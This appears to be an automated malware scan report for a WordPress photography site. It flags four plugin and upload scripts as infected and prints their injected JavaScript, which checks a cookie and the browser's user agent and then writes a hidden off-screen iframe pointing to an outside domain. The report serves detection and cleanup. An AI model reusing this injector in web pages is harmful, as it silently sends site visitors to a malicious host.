Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sandytidyphotography.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sandytidyphotography.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 23:54:31 GMT Location: http://www.sandytidyphotography.com/ Server: Apache Vary: Accept-Encoding Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sandytidyphotography.com/ | 200 OK Content-Length: 21646 Content-Type: text/html | clean |
http://www.sandytidyphotography.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-content/plugins/new-simple-gallery/new-simple-gallery.js?ver=4.0 | 200 OK Content-Length: 12577 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-includes/js/underscore.min.js?ver=1.6.0 | 200 OK Content-Length: 14424 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-content/plugins/multi-level-navigation-plugin/scripts/superfish.js?ver=1.4.8 | 200 OK Content-Length: 4897 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: agistikoi.portaldeofertas.com.br function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).g ...[4084 bytes skipped]... Decoded script: <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://agistikoi.portaldeofertas.com.br/ifaguglar16.html This URL is marked by Google as suspicious <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.sandytidyphotography.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.8 | 200 OK Content-Length: 1190 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-content/uploads/pp/static/1411504736_script.js | 200 OK Content-Length: 51391 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: agistikoi.portaldeofertas.com.br (function(){function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).g ...[3190 bytes skipped]... Decoded script: <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://agistikoi.portaldeofertas.com.br/ifaguglar16.html This URL is marked by Google as suspicious <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://sandytidyphotography.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 23:54:40 GMT Location: http://www.sandytidyphotography.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.sandytidyphotography.com/test404page.js | 404 Not Found Content-Length: 18564 Content-Type: text/html | clean |
http://www.sandytidyphotography.com/blog/ | 200 OK Content-Length: 66091 Content-Type: text/html | clean |
http://www.sandytidyphotography.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-en.js?ver=2.6.11 | 200 OK Content-Length: 11225 Content-Type: application/javascript | clean |
http://www.sandytidyphotography.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.11 | 200 OK Content-Length: 72809 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: agistikoi.portaldeofertas.com.br function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).g ...[3546 bytes skipped]... Decoded script: <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://agistikoi.portaldeofertas.com.br/ifaguglar16.html This URL is marked by Google as suspicious <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.sandytidyphotography.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.11 | 200 OK Content-Length: 4235 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: agistikoi.portaldeofertas.com.br function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).g ...[3525 bytes skipped]... Decoded script: <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://agistikoi.portaldeofertas.com.br/ifaguglar16.html This URL is marked by Google as suspicious <iframe src="http://agistikoi.portaldeofertas.com.br/ifaguglar16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sandytidyphotography.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 23:54:31 GMT
Location: http://www.sandytidyphotography.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1
...244 bytes of data.
GET / HTTP/1.1
Host: sandytidyphotography.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 23:54:31 GMT
Location: http://www.sandytidyphotography.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1
...244 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sandytidyphotography.com
Referer: http://www.google.com/search?q=sandytidyphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sandytidyphotography.com
Referer: http://www.google.com/search?q=sandytidyphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.